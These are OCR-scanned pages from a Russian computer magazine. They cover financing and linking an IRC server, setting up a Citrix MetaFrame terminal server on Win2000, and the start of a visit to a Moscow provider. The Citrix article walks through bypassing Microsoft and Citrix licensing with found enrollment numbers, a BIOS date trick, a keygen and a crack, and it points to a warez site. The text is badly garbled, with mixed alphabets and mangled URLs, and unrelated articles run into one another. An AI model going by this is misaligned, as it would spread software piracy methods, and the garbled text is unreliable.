дится отрубать картинки в браузере при сер- 
финге из локалки, - халявного трафика. Да- 
вай прикинем, какие бонусы я мог бы при- 




поднять, проплатив свои кровные за место 
под солнцем в «Мастаке»? 

Меззаде о( Ше сіау. Сообщение дня, 
которое ты имеешь радость лицезреть при 
каждом коннекте на свой сервер. Обычно 
это 2-5 тысяч знаков (2-4 прокрутки экрана 
на разрешении 1400x1050 или 0.5-1 стра- 
ница твоего любимого журнала), которые 
ты волен использовать по собственному 
разумению. Чаще всего туда вписывают 
рекламу хостингов или любого другого ин- 
тернет-сервиса, который может быть дос- 
тупен на международном уровне (значит, 
сервер должен уметь процессить кредитки 
или принимать РауРаІ). Из хостингов самы- 
ми вероятными рекламодателями оказыва- 
ются зМ-ІіозІег’ы. Они продают доступ на 
свои тачки, разрешая развесить несколько 
процессов в бэкграунде. Понятное дело, 
что ІПС для них - одно из наиболее сочных 
и эффективных мест рекламы. У доброй 
половины их юзеров список процессов це- 
ликом забит ВіІсНХ’ами и ВІМС’ами. Сегод- 
ня юзер видит нужный МОЮ, а завтра уже 
закупается шеллами или баунсерами. Свя- 
завшись с отделами продаж конкретных 
зііеіі-ргоѵісіег’ов, можно отыскать потенци- 
ального рекламодателя. Отыскивать дойных 
коров получается и по ключевым словам 
«ипіх+зііеіі+зегѵісе» в Ооодіе, и на конфах 
для шелл -провайдеров (вроде (огит.$ІіеІІге- 
ѵіеѵшт), и на ѵѵмѵ.еддіац.сот. 

Существует даже целая сеть ігс.$ІіеІІ$пеі.огд, 
где крутятся десятки официальных каналов 
зМеМ-хостеров. Там же можно обтереть все 
возможности с хозяевами/админами серви- 



сов (чаще всего обе ипостаси представлены 
одной личностью). 

Однако, как и в случае с описанными ниже 
Іадііпе’ами, следует относиться скептически к 
возможности заработка на этом. Потому что 
мало кто читает МОЮ, а в тэги все чаще и 
чаще вставляют просто смешные фразы. 

Тадііпе. Каждый сервер в сети может 
поставить комментарий, который будет ви- 
ден при коннекте (будет на постоянке в 
ЗМиз-окне), а также при запросе командой 
/Ііпкз. В Іадііпе можно вписать рекламу. На- 
иболее эффективно рекламировать там 
конкретный канал, который может быть вы- 
делен под спонсора. Тема спонсора указа- 
на чуть ниже. 

А МС-СППМ ПЕГОПЬНО! 

Убедительная часть сервисных сетей, нап- 
ример знаменитый ОАІлеІ, позволяет прово- 
дить регистрации ников (каналов) лишь пос- 
ле верификации - успешной посылки письма 
на мыло регистрируемого. В письме указы- 
вается линк, по которому нужно кликнуть, 
или специальная команда, которая активизи- 
руется после вбива в ІВС. 

Длину письма никто не ограничивает, сеть 
может легко вписать туда любую рекламу. В 
отличие от жесткого спама, оседающего в 
твоем ящике, мессаги от сетей в большин- 
стве случаев внимательно просматриваются 
получателем. Ряд сетей предоставляет мазу 
почтовой рекламы для владельцев новых 
серверов, слинкованных с сетью. Практика 
показывает, что сразу после линковки мазу 
могут и не выдать - счастье будет лишь по 
прошествии 6-8 недель, которые докажут 
стабильность твоего начинания. 

А ища спонсора. 

ИНТИМ НЕ ПРЕДППГПТЬ 

Самому за все платить - это очень нак- 
ладно. Нужна подмога! Зачем искать рекла- 
модателей, если можно выбить живые день- 
ги у сочувствующих? Однажды мне предла- 
гали $2000 за взлом ІВС-сервера, где оби- 
дели одного горячего юношу. Самое инте- 
ресное, что сие было не минутным порывом, 
а направленным желанием, и один «брат по 
оружию» удовлетворил этот запрос, получив 
обещанное! Не знал наивный юноша, что за 
отданные деньги он мог бы стать соадмином 
нового сервера. С крутым статусом и новы- 
ми правами он имел бы мазу постепенно 
выгнать нерадивого иркопа из сети. Однако 
ретивые юноши (те, что с каналов вроде 
#Ьаки ;) - далеко не всегда лучшие союзни- 
ки. Ибо они, по большей части, существуют 
по принципу «Против кого дружим?». Их 
дружба и финансирование могут быть не 
столь продолжительными. Тем более, при 
линковке тебе надо будет указать приблизи- 
тельный список твоего зІаТС’а - команды, 
обеспечивающей жизнедеятельность буду- 
щего серванта. Указав же опального иркера, 
ты рискуешь получить отказ даже при иде- 
альности твоего предложения по другим па- 
раметрам. Более продуктивно искать союз- 
ников (читай материально сочувствующих) 
на хелперских каналах (вроде #МеІр и 
#ігсМеІр). Постоянные активные юзеры среди 
местных обычно обладают убедительным ав- 
торитетом. И помимо материального влива- 
ния, они смогут помочь в продвижении тво- 
ей заявы на линковку. Другое дело - чело- 
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век, проводящий дни напролет в поддержке 
юзеров, вряд ли будет обладать бабками для 
вклада в твое начинание. 



Л ПИШИ. КТО СТОНЕТ 
КОРЕЙ ГОРЫ? 



Все красавицы заявляют, что выйдут замуж 
лишь по любви. Основные ІВС-сети заявляют, 
что примут на линковку любого позитивного 
сервер-админа, который готов принести лю- 
бовь и заботу о сети. На самом деле бары- 
шень более всего парит отсутствие педикуле- 
за у жениха :). Про ІЯС можно сказать без 
улыбки: главное при обработке линковочной 
заявки - личность заявителя, список его Іесіі 
зМ’а. Если заявляет персона мутная, то сер- 
вер может рассчитывать на самые жесткие 
придирки. Если же приходит интернет-звез- 
да, то ее амбиции обязательно оправдаются. 

Я спрашивал админов из #гоийпд разных 
сетей, применяя характерную славянскую 
прямоту: сколько лет в сети должен провес- 
ти потенциальный зегѵ-асіт, чтобы его восп- 
риняла большая сеть всерьез? Всюду демок- 
ратия, и слышно стандартное мяуканье: не 
важно кто, важно качество сервера. Практи- 



ка же показывает, что средний минимум для 
достаточно громкой заявки о себе - 3-4 года 
постоянной отсидки. Конечно, есть случаи, 
когда принимают и зелененьких. Часто в их 
случае помогает впечатляющий список тех- 
нической команды. Админы очень падки на 
заявы от работников именитых компаний 
вроде ЗІІІМ, АОІ_, Зргіпі, ІВМ. Отыскать по- 
добных личностей можно даже на каналах 
вроде #иза, где их выдаст фирменный кор- 
поративный хост. Понятно, что большинство 
иркеров из ИТ-компаний занимаются техни- 
ческими вопросами и смогут легко участво- 
вать в поддержке. На чужом горбу в рай? 
Почему бы и нет? Я лично наблюдал десяток 
случаев, когда из двух идентичных серверов 
(то же железо, схожая по грамотности и 
опыту техподдержка, одинаковой мощи ин- 
тернет-соски) один был принят из рук зна- 
менитого опа, а другой - отвергнут при заяв- 
ке незнакомцем. 

Будущее начинается сегодня. Сегодня же 
было вчера? Большую часть новых заяв про- 
веряют, выясняя опыт администрирования в 
других сетях. Если чел раньше был завязан с 
маленькой сеткой, то его опыт практически 




не повлияет на решение комиссии. Если же 
личность была на 11пс1егМе1/ЕРпе1/1гсМе1, то 
это определенно поспособствует продвиже- 
нию. В случае неудачного опыта, пусть даже 
полученного по ходу длительного админист- 
рирования крупной сетки, могут возникнуть 
сложности. Рассказывает один из бывших 
админов Ефнета: «Мы отказали серверу, ко- 
торый до этого был в ІгсМеІ, потому что я уз- 
нал у своего приятеля на ІгсМеІ о причине 
делинковки. И оказалось, что этот сервер 
там конкретно всех доставал. После получе- 
ния этой информации у сервера не остава- 
лось никаких шансов подключиться к ЕРМеІ». 

Техническая поддержка награждается ста- 
тусами ІВСор’ов. Сколько же можно заиметь 
оных, сколько корешей-подельников можно 
осчастливить? Все зависит от правил конк- 
ретной сети и сложности работы, проводи- 
мой на сервере. К примеру, Вігоп позволяет 
иметь лишь 2-3 иркопа, ибо сеть работает 
безбедно практически на автопилоте. В слу- 
чае же с ЕРпеі в среднем на сервер прихо- 
дится 8 опов. Если сервер крохотный, то ло- 
гично иметь лишь 5-7 человек на подмоге. 
Большой же может поставить все 10-14. В 
ряде сетей практикуется прописка Ьаскир 0- 
Ііпе, т.е. списка резервных опов. Сей О-Ііпе 
активизируется, когда нужна дополнительная 
помощь. Например, при отбивке массиро- 
ванной ООоЗ-атаки. 

^ вооружайся знаниями 

Вот, наверное, и все, что тебе нужно иметь в 
виду, если ты собираешься поднять и при- 
линковать свой сервер к уже существующей 
сети. Помни, что итог твоей линковки зави- 
сит не только от того, что я описал в статье, 
но и от так называемого человеческого фак- 
тора. Вполне возможно, твои человеческие 
качества настолько приглянутся комиссии, 
что тебя примут в команду, даже если ты ни- 
когда не был админом, и дадут тебе шанс 
приобрести опыт со временем. Стань коро- 
лем ІВС, удачи! X 




* 

л Сети не хотят но- 
вых админов. Сети 
хотят новых трудяг 
и помощников. 

а 90-95% ІВС-сетей 
работают на 
РгееВЗй. Есть также 
Ыпих и Зоіагіз, но 
их довольно мало. 

л Очень важно, 
чтобы на коллокей- 
шене были грамот- 
ные админы, кото- 
рые не будут вес- 
тись на провокаци- 
онные телеги- 
аЬизе’ы от недоб- 
рожелателей. 
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ернинапьный доступ использовался еще в старых окошках серии 3.1 1. Это неспроста, ведь сервис удаленного доступа эконоиит 
массу времени и денег. Если админ ставит службу на предприятии, он может юзать коммерческие припожения всего с одной 
лицензией. При этом штат сотрудников будет очень большим! Заманчиво? Еще бы! Осталось лишь рассказать о тонкой установке 
і администрировании терминального сервера. 



установка и обспуживоние терминопьных сервисов 



А ТЕРМИНППЬНЫЕ ПРЕЛЕСТИ 



о сути, терминальный сервер 
предоставляет клиенту доступ 
к рабочему столу винды. Суще- 
ствует множество программ, ко- 
торые осуществляют такую же 
функцию (Касітіп, ѴІМС и т.п.), 
но коренное их отличие от тер- 
минальных сервисов в том, что 
последние практически не жрут процессор при 
новом подключении, дружат с АсйѵеОігесІогу 
(или ЗатЬа) и очень гибко настраиваются. 
Прочитав эту статью, ты поймешь все прелести 
этих служб и научишься грамотно настраивать 
свой будущий сервер приложений. 

Как ты догадался, изначально МісгоЗоЙ 
взялась за идею удаленного доступа. Пока 
не было никаких альтернатив, все предприя- 
тия пользовались услугами стандартных тер- 
минальных служб (которые по дефолту поя- 
вились в серверных версиях N14). Но недос- 
татки сервисов от М3 трудно было не заме- 
тить. Это ограничение в разрешении, коли- 
честве цветов, невозможность трансляции 
звука, непереносимость буфера обмена, от- 
сутствие администрирования и разграниче- 
ния прав и т.д. и т.п. Любому человеку по- 
нятно, что полноцветное приложение очень 
трудно (а в ряде случаев вообще невозможно) 



запустить удаленно. Юзеры страдали до тех 
пор, пока компания Сіігіх не решила выпус- 
тить свои сервисы терминалов, которые до- 
полняли уже существующие от М3. После их 
установки клиенты получали неограниченные 
возможности: удобную настройку, поддержку 
теневого доступа, маппинг дисков, доступ к 
рабочему столу через ѴѴеЬ, удобный публи- 
катор приложений и многое другое. Естест- 
венно, что за удовольствие надо платить. 
Лицензии Цитрикса стоят намного дороже 
лицензий от Майкрософт. Но крякеры не 
дремлют, поэтому многие российские 
предприятия юзают пиратские лицензии и 
нисколько не жалеют об этом :). Не будем 
гнать лошадей, поскольку о лицензировании 
терминалов я расскажу в отдельной главе 
этого познавательного материала. 

А С ЧЕГО НПЧНЕМ? 

О симбиозе М3 и Цитрикса можно рассказы- 
вать часами, ведь с каждой версией ѴѴіпсІоѵѵз 
стандартные терминалы становятся все умнее. 
Некоторые админы говорят, что в ѴѴіп2003 тер- 
минальные сервисы вообще можно не допол- 
нять громоздким Цитриксом, однако я человек 
старой закалки :). Именно поэтому я расскажу 
о проверенной классической цепочке ѴѴіп2000 
+ ТегтЗгѵ + Сіігіх МеШате ХРе 1 .0. 




к. 



Первое, что тебе нужно сделать, - устано- 
вить ѴѴіп2000. Я думаю, не стоит расписы- 
вать весь процесс инсталляции, уж что-что, 
а винду ты должен уметь ставить :). Обращу 
внимание только на две вещи. Во-первых, не 
забудь задать оптимальное количество подк- 
лючений на терминальный сервер. Это луч- 
ше всего сделать в процессе инсталляции, 
чтобы не забыть в дальнейшем. Во-вторых, 
устанавливай терминал в режиме ІМА и в ре- 
жиме ѴѴіп2000. Эти условия являются обяза- 
тельными для установки Сіігіх (впрочем, пе- 
ределать настройки можно позже, в пункте 
«Установка и удаление программ»). Когда 
винда будет установлена, не спеши ставить 
на нее хотфиксы и патчи. О пользе оных чи- 
тай во врезке. Настало самое время поду- 
мать о вопросе лицензирования терминалов. 

А ПОЧЕИ ЛИЦЕНЗИЯ? 

Существует три проверенных способа лицен- 
зирования. Один из них легальный. Ты акти- 
вируешь терминал на Цф$://асііѵаіе.пісго$о(і.соп 
и покупаешь лицензии. После этого тебе вы- 
дают код клиентских лицензий, который не- 
обходимо забить в соответствующий пункт. 
Ты делаешь это и радуешься жизни. Но час- 
то люди вынуждены немного пресекать за- 
кон и юзать два других способа лицензиро- 
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вания. Я ни к чему не призываю, просто рас- 
скажу тебе шаги таких нечестных личностей :). 

Вначале администратор сервера получает 
код продукта. Его можно увидеть при запуске 
мастера лицензирования терминалов (Адми- 
нистрирование -> Лицензирование служб 
терминалов -> Мастер лицензирования). 
После того как код получен и записан, сисад- 
мин топает на Шр$://асІіѵаІе.тісго$оГС.сот и акти- 



вирует службу по этому коду. Кроме этого, 
данные о пользователе, введенные в форму 
М3, должны совпадать с данными, которые 
запрашивает мастер. Первый шаг лицензиро- 
вания завершен. Теперь пользователь заби- 
вает выданный код сервера, тем самым акти- 
вируя его. Далее админ снова посещает акти- 
ватор, выбирает пункт добавления лицензий 
и получает код по так называемому номеру 
заявки (епіегргізе епгоіітепі адгеетепі пит- 
Ьег). Этот самый номерок администратор на- 
ходит в зарубежных поисковиках по запросам 
«епгоіітепі адгеетепі питЬег» и т.п. Короче 
говоря, сисадмин заносит этот номер и коли- 
чество соединений, а в ответ получает завет- 
ный ключ лицензий, после чего наслаждается 
бесперебойной работой терминалов. 

Второй способ более безобидный и, я бы 
сказал, узаконенный. Перед тем как устанав- 
ливать ѴѴіп2000, админ переводит время в 
ВІОЗ’е на 10 лет вперед, затем инсталлит 
систему и подключается установленным кли- 
ентом к новому серверу приложений. Тут же 




происходит кое-что интересное: сервер ли- 
цензирования записывает дату подключения 
и прибавляет к ней 90 дней. То есть генери- 
рует последний день триальной работы. 
После фокуса со временем дедлайн прихо- 
дится на конец 2014 года и не изменится 
после обратного перевода времени! Только 
не забудь перевести часы назад после пер- 
вого соединения, иначе после установки 
Сіігіх начнутся аномальные явления :). 

И наконец, существует еще один способ, 
который заключается в подмене бинарного 
кода какой-то 611. К сожалению, ссылки на 
кряк быстро устаревают, и лично мне не 
удалось поиметь чудесный патчер. Я думаю, 
нечестному админу вполне хватит двух прос- 
тых способа обхода лицензирования ;). 

А установи сітвіх и зпбудь 

0 НЕВЗГОДПХ 

Можно сказать, что площадка для Сіігіх пост- 
роена. Теперь трави своего осла на 
йрУ/йр.пп2.ги и сливай все, что там есть :). 




ПОЛЕЗНЫЙ СОФТ ДПЯ ПОЛЕЗНОГО ДЕПП 

С твоего позволения, расскажу про софт, который может использоваться на терминальном серве- 
ре. Добрую половину из этого списка я юзаю сам, поэтому уверен, что тебе понравятся нижеопи- 
санные утилиты. 

ѵОезкіор - программа для ламеров. Для сотрудников она, конечно же, не подходит, а вот для стаже- 
ров и студентов - самое то. Прога устанавливается на клиентской машине. При запуске она открыва- 
ет полноэкранную консоль Сіітіх’а, а когда юзер завершает терминальный сеанс, выключает локаль- 
ный компьютер. Бери утилиту по ссылке ѵѵѵѵѵѵЛИеІИіп.пеѴѵѵгаррег.гір. 

Тзееззіопіооі - софтина нужна для закрытия удаленных сеансов. И не просто для закрытия, а с опо- 
вещением. Скажем, ты захотел ребутнуть винду после установки патча. Запусти утилиту, и она сразу 
разошлет сообщения о том, что терминал скоро будет выключен. Качаем отсюда: 

ѵуѵуѵѵ.ІНеІІііп . пеІ/ТЗзеззіопІооІ .гір. 

СеШзегз - утилита помогает увидеть всех подключенных пользователей. Но увидеть не в окне, а в 
консоли. Уверен, если ты любишь писать скрипты, то тебе понравится эта программа. В любом слу- 
чае бери тулзу по адресу ѵѵѵѵѵѵЛИеІИіп.пеѴдеІизегз.гір, пригодится! 

СІозе - аналог консольного кіІІ. Запускается с параметром, равным имени программы, а затем завер- 
шает задачу. Ничего лишнего. Берем на ѵѵѵѵѵѵ.ІИеІИіп.пеІ/сІозе.гір. 

Соп2ргпі - скрипт подключает принтер клиента прямо из консоли и только тогда, когда это необхо- 
димо. Я использую этот сценарий давно, поэтому рекомендую и тебе. Сливай отсюда: 

ѵѵѵѵѵѵ.ІІіеІІі іп.пеѴсоп2ргп1.2Ір. 

МетПод - прога позволяет узнать, какой процесс нагружает сервер. После определения используй 
СІозе и корректно заверши программу. В общем, весьма полезная утилита, лежит тут: 

ѵѵѵѵѵѵ.ІІіеІІі і п . пе 1/тет Иод . гі р . 

Разумеется, это не все программы, которые рекомендованы для установки на терминал. Более 
подробный список изучай на ѵѵѵѵѵѵ.сіІгіх.рр.ги/ргодз.ИІтІ. 
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л Для Сіігіх суще- 
ствуют свои хот- 
фиксы и сервис 
паки. Взять их ты 
сможешь на 
шѵѵѵѵ.сіігіх.сот. 

цЦи 

л Разумеется, для 
продуктивной ра- 
боты терминалов 
тебе придется по- 
добрать мощный 
комп с гигабайтом 
памяти. 



А там имеется дистрибутив Шгіх МеІаРгате 
ХРе и кейген для генерации нужных лицен- 
зий. Запускай аиІогооТехе и следуй всем 
инструкциям инсталлятора. Если ты слушал- 
ся автора и установил терминал в режиме 
ІМА, то у тебя не будет никаких проблем :). 
Единственный нюанс: откажись от установки 
пТизе (доступ через ѴѴШ), если у тебя не 
установлен 133. Когда дело дойдет до уста- 
новки клиентов, можешь нажать «СапсеІ», 
ибо клиент не входит в поставку дистрибути- 
ва (его можно заинсталлить чуть позже). В 
конце инсталляции зеШр попытается запус- 
тить службу ІМА и попросит перезапустить 
компьютер. Теперь остается поставить ряд 
нужных лицензий и затестировать терминал 
в полную силу. 

После ребута залогинься под админом и 
приступай к администрированию терминала. 
Ты наверняка заметишь красивую панель 
СіТгіх справа (немного напоминает панельку 
от ОІТісе 97). Кликай на самую последнюю 
иконку, затем авторизуйся в ферме и выбе- 
ри закладку Шсепзез. Для полноценной рабо- 
ты продукта тебе понадобятся по крайней 
мере три лицензии: Сіігіх ІІзег Шсепзе Раск, 
МеІаРгате ХРе Соппесйоп Раск и МеІаРгате 
ХРе 1 .0 Тог ѴѴіпсІоѵѵз. С таким комплектом 
сервер будет работать долгие годы. Генери- 
руется все это добро с помощью кеудеп’а, 
входящего в дистрибутив. Главное, чтобы 
номер продукта был идентичен коду, указан- 
ному в геабте.М, который ты, конечно же, 
прочитал перед установкой. Собственно, с 
этого момента начинается самый увлека- 
тельный процесс администрирования и вве- 
дения в жизнь мощной службы терминалов. 

А СЕКРЕТЫ 

администрирования 

Подсядь за какой-нибудь компьютер в ло- 
кальной сети и установи клиент Сіігіх. Его 
можно достать с шѵѵ.сіігіх.сот в разделе 
ЭоѵѵпІоасІ. Инсталляция клиента - процесс 
недолгий. После него на рабочем столе поя- 
вится иконка менеджера соединений. Запус- 
кай его! Теперь добавляй новый сервер, кли- 
кая по соответствующему значку. Соедине- 
ние ведется по локальной сети (І_осаІ Агеа 
ІМеІѵѵогк), дескрипшн включает любое описа- 
лово твоего терминала. Ниже (под радиоба- 
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Бесконечное множество дисков 



ОХ УЖ ЭТИ СЕРВИС паки... 

Б ывалые админы не рекомендуют ставить на терминальный 
сервер четвертый сервис пак. Это объясняется тем, что пос- 
ле инсталла возможны глюки и исключительные ситуации. Это 
отчасти так. После наката 5Р4 у меня пропали пермишены для 
многих профилей. В результате пришлось возвращать их вруч- 
ную. Впрочем, на голую Винду пакет встал без аномалий. Ста- 
вить или не ставить - решать тебе, но я советовал бы ограни- 
читься 5РЗ. С третьим сервис паком Сіітіх дружит без ссор. 




тоном Зегѵег) впиши айпишник машины, на 
которой вертится Сіігіх. Способ шифрования 
можно оставить дефолтовым, а вот разреше- 
ние и количество цветов рекомендую поме- 
нять (именно для этого ты и ставил Сіігіх). 
Здесь же можно оформить автоматическую 
регистрацию в системе и домене, а также 
запустить любое приложение после старта 
клиента. Когда несложные настройки будут 
выполнены, кликай по новому соединению, и 
перед тобой откроется новое окно - связь с 
быстрым терминальным сервером. 

Скорость соединения впечатляет. Возни- 
кает ощущение, что ты работаешь напрямую 
с сервером. Теперь зайди в «Мой компью- 
тер» и зацени прибавления локальных дис- 
ков. Дело в том, что все диски от клиентско- 
го компьютера стали сетевыми! Это очень 
удобно! Теперь, чтобы перенести какой-ни- 
будь файл, тебе не надо пользоваться РТР- 
сервером или ІМеШіоз-соединением. Впро- 
чем, из соображений безопасности эту фичу 
можно легко отключить в свойствах менед- 
жера соединений. Теперь самое время за- 
ново залогиниться в ферму (ты это уже де- 
лал во время лицензирования) и заценить 
премудрости Сіігіх. 

Первая вкладка с именем «Арріісайопз» по- 
могает выставить приложение на всеобщее 
обозрение. То есть работник предприятия мо- 
жет запустить удобный менеджер приложений 
и выбрать любое из них. Не правда ли, удоб- 
но? Только перед этим ты должен все грамот- 
но установить и сделать программу публич- 
ной. Доверься мастеру, который вызывается 
правым кликом по вкладке, и все будет ОК. 



Вторая вкладка задает администраторов 
СіТгіх. То есть логины людей, имеющих право 
просматривать или изменять настройки тер- 
минала. Именно просматривать ИЛИ изме- 
нять: ты вправе создать аккаунт с привиле- 
гиями геасі-опіу. Следующий пункт мы про- 
пустим, потому что уже насладились уста- 
новкой лицензий, а вот про «Еѵаіиаіогз» сто- 
ит поговорить подробнее - здесь задаются 
все настройки Сіігіх. 

Рекомендуется не менять значения специ- 
ально подобранных функций. Однако знать, 
зачем они нужны, несомненно, стоит. Кликай 
по дефолтовым настройкам и ознакомься с 
тем, что за собой скрывает этот пункт. В 
первом подменю мы видим порог загрузки 
процессора. При превышении лимита ин- 
формация о «нарушителе» вместе со време- 
нем и датой занесется в специальный лог. 
Данная фича очень полезна при исследова- 
нии какой-либо неполадки, и ограничивать 
загрузку рекомендуется только в этом слу- 
чае. Следующая настройка немного похожа 
на первую, поскольку она инициализирует 
диапазон нагрузки. То есть если камень ра- 
ботает менее чем на 10%, то это тоже счита- 
ется ненормальным и должно быть зафикси- 
ровано в журнале. 

«Оізк Эаіа І/О» отслеживает превышение 
при работе с винчестером. Здесь задается 
максимальное время передачи, превышать 
которое непозволительно. Нижележащая 
настройка ограничивает количество опера- 
ций с носителем в единицу времени. 

Далее следует ограничение по ІР-адресам. 
Если ты порядочный админ, можешь запре- 
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тить юзать приложения тем людям, которые 
занимаются другой работой. Например, мож- 
но урезать в правах бухгалтеров и запретить 
им пользоваться аськой. Либо наоборот - не 
давать запускать 1С некомпетентным людям. 
Я считаю эту настройку очень полезной. Пос- 
ледняя важная фича позволяет управлять 
загруженностью ОЗУ. От тебя лишь требует- 
ся указать числовой потолок, и резерв памя- 
ти всегда останется незадействованным. 

Последняя вкладка позволяет установить 
сетевой принтер на терминальный сервер. 
Вообще, СіШх очень осознанно подходит к 
проблеме печати. Даже если принтер имеет 
нестандартный драйвер, он легко инсталли- 
руется с помощью мастера. Достаточно 
лишь кликнуть пару раз мышью, как новый 
принтер разместится в системе. Кстати, при 
подключении автоматически юзается и клие- 
нтский принтер, так что можно печатать не 
отрываясь от консоли. 

Л СПОСОБЫ 9СШ0ВКИ 
ПРИЛОЖЕНИИ 

Прежде чем пускать на терминал новых кли- 
ентов, тебе необходимо установить приложе- 
ния. Я говорю о таком софте, как 1С, ОТСісе, 
АиШСАО, ЗЭМАХ и т.п. Если ты думаешь, что 
процесс установки похож на обычный, то ты 
немного ошибаешься :). Сервер действует 
по-умному. Он записывает в реестр инфор- 




мацию о том, что приложение юзается в тер- 
минальном режиме, поэтому так просто уста- 
навливать программу нельзя. Мало того, 
виндовый терминал вообще не позволяет за- 
пускать файлы зеШр.ехе и іпзіаіі.ехе. Не буду 
тянуть резину, лучше распишу два способа 
установки новых программ. 

О. Оконный. Чтобы поставить увесистый 
дистрибутив, тебе необходимо зайти в Па- 
нель управления -> Установка и удаление 
программ -> Установка новой программы, 
затем выбрать пункт «С СО или дискеты» и 
указать путь к зеШр.ехе. Необходимо соблю- 
дать осторожность и кликнуть на ОК только 
после установки программы. Именно тогда 
происходит открытие всех веток реестра для 
простых пользователей. 

О. Консольный. Открой стб.ехе и выпол- 
ни команду сМапде изег /іпзіаіі. Таким обра- 
зом, сеанс автоматически переходит в ре- 
жим установки приложений. После инсталля- 
ции всех необходимых программ набирай 
сМапде изег /ехесиШ, и сервер вернется в 
обычный режим работы. 

Внимание! Устанавливать программы 
лучше в ночное время, либо когда на сер- 
вере нет других пользователей. Дело в 
том, что при работе с софтом во время ус- 
тановки возможны глюки, потому что СіШх 
закрывает некоторые ветки реестра от глаз 
обычных юзеров. 

Л БДИ И МОНИТОРЬ! 

Если ты работаешь админом и консультан- 
том по совместительству, то тебе очень пон- 
равится возможность теневого управления 
сеансами. Для этого найди значок на панели 
СіШх (третий сверху с изображением лупы) и 
дави на него. Авторизуйся в домене, и ты 
сможешь лицезреть еще одну панель, только 
уже вертикальную. Ты запустил менеджер 
теневых сеансов, который может порулить 
чужим СіШх-соединением. Надо заметить, 
что даже админу придется получить подтве- 
рждение пользователя о соединении. Только 
после этого он может управлять чужой кон- 
солью. Чтобы попасть в чужой сеанс, нажми 




на пункт «ЗІіасІоѵѵ» и обнови список активных 
пользователей. Теперь перетащи нужного 
юзера в правую часть и получи от него подт- 
верждение. Если все прошло гладко, ты уви- 
дишь вторую вкладочку, которая ведет к за- 
ветной консоли потерпевшего :). 

Чтобы работники не злоупотребляли воз- 
можностями и не подглядывали друг за дру- 
гом, посети менеджер соединений СіШх (чет- 
вертая иконка на панельке с изображением 
молотка). Войди в раздел «Зесигііу» и ограничь 
права всех пользователей на предмет ЗІіасІоѵѵ, 
оставив возможность администрирования 
только для себя (или только для своего по- 
мощника). Если здесь же нажать на пункт 
«Сіігіх ІСА 3.0», ты попадешь в раздел измене- 
ния параметров сервера, где можно отключить 
маппинг дисков, портов, клипборда, принте- 
ров и многого другого. Поизучай, пригодится! 

Я совсем забыл сказать, что СіШх (как и 
виндовый терминал) позволяет временно отк- 
лючать сеанс. То есть, скажем, пошел сотруд- 
ник на обед, а перед этим отключил сеанс, 
выбрав соответствующий пункт в «Заверше- 
нии работы». После обеда он может заново 
авторизоваться и вернуться к работе, словно 
и не отходил от машины. Но бывает, что сот- 
рудник работает под двумя логинами или во- 
обще забивает на терминал. А если при этом 
на машине от его имени запущена пара 
ЗОМАХ’ов, Бордов, Винамп и какой-нибудь 
РІіоШзІіор, серверу легче не станет :). Чтобы 
пресекать подобные утечки памяти и процес- 
сорного времени, существует так называемое 
меню администрирования сеансов. Для входа 
в него набери команду Шабтіп. Здесь ты мо- 
жешь увидеть все процессы пользователей и 
даже прибить любой сеанс. Ибо нефиг :). 

Л ПДНИНЬ И ПРОСВЕЩПЙСЯ! 

Вот, собственно, и все, что я хотел расска- 
зать о чудесном дистрибутиве СіШх. К сожа- 
лению, я не написал, как объединить нес- 
колько серверов в одну ферму. Это приведет 
к повышению производительности и создаст 
кластер с распределением памяти и процес- 
сорного времени по всем серверам. Я не 
коснулся технологии ІМШзе, о которой можно 
рассказывать долгое время. Но я спокоен, 
так как дал тебе толчок к освоению терми- 
нальной теории. С ней ты всегда можешь 
ознакомиться на ресурсе сіігіх.рр.ги, где полно 
книг по устройству терминалов. Если созре- 
ет какой-нибудь вопрос, то задавай его на 
форуме или пиши мылом - постараюсь по- 
мочь. Надеюсь, что, прочитав этот интерес- 
ный материал (ой, а скромности тебе не по- 
дарить? :) - прим, ред.), ты станешь пример- 
ным администратором нового сервера прило- 
жений. И пусть удача улыбнется тебе! ЗС 




л На компакте мы 
выложили дистри- 
бутив Сі(гіх, а так- 
же все необходи- 
мые утилиты, опи- 
сываемые в этой 
статье. 




л За дополнитель- 
ной информацией 
обращайся к стра- 
ницам сайта 
ѵтѵѵ.сіШх.рр.ги. 
Здесь ты найдешь 
ответы на все воп- 
росы, а также 
сольешь несколько 
мегов полезного 
софта. 
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□ аждый день сотни тысяч интернетчиков выходят в режим онлайн, чтобы почитать свежие новости, обновить свой сайт, кинуть кого- 
нибудь на НН2 или просто потрещать в аське. Собственно, для всего этого не нужно знать ничего далее провода, вставленного в 
сетевую карту компьютера. Остальное - головная бонъ людей, обеспечивающих пользователям связь. Вот к таким людям мы с 
Купером и наведались нежданно-негаданно :). 



НОШИ В ГОСТЯХ У КРУПНОГО СТОЛИЧНОГО ПРОВПЙДЕРП 



л 



А УТРО. ЧОЙ. ВОЛНЕНИЕ 

Я тро семнадцатого сентября не 
предвещало ничего хорошего. 
Я отправлял в «Точку» Никито- 
са, а он в самый последний 
момент не смог поехать, пото- 
му что не наточил коньки. Об 
этом я узнал как раз утром, 
поэтому пришлось менять 
свои планы по полной программе. Но ниче- 
го, и не так попадали - прорвемся. Звонок 
Куттеру и закидывание удочки издалека. Не- 
навязчивый треп о том, что уже вышел све- 
жий номер в продажу, о девчонках, о Лозо- 
вском. Куттер, сонная муха, не просек тему 
сразу и охотно поддерживал со мной разго- 
вор :). В тот момент, когда жертва уже была 
расслаблена и готова к известию о том, что 
ей придется сейчас выползти из постели и 
стремглав помчаться со мной в «Точку», я 
Куттеру все и сказал. Наш доблестный глав- 
ред сразу же согласился, сказав: «Но рис- 
пект, дырявый!» (извините, я в английском 
слаб, но это значит, вроде бы, «Сейчас при- 
еду, Бубел!»). 

Волновался я дико, потому как нормально 
подготовиться к такому походу у меня поп- 
росту не было времени. Но ничего, я же 
знал, что со мной товарищ Куттер, который, 



Бублик на криминального авторитета 
похож в своей кожанке. 



если что, станет козлом отпущения :). Ну а 
если серьезно, то нервничал я исключитель- 
но от резкой смены планов. 

Ну да ладно. В назначенный срок встрети- 
лись с Куттой на Кузнецком, заскочили в ре- 
дакцию, взяли там хорошую цифру и рвану- 
ли на Смоленку, где располагается площад- 
ка для колокейшена компании «МТУ-Интел» 
(там еще на доме вывески с «МТУ-Интел», 
«МТУ-Информ» и «Точка Ру»). 

Как нам объяснили, здание это находится 
напротив МИДа России. Прежде чем заме- 
тить то, вокруг чего мы шарились минут 
двадцать, нам пришлось позвонить Илье 
Фабричникову - специалисту, выделенному 
компанией МТУ в наше свободное пользова- 
ние на весь день :). 

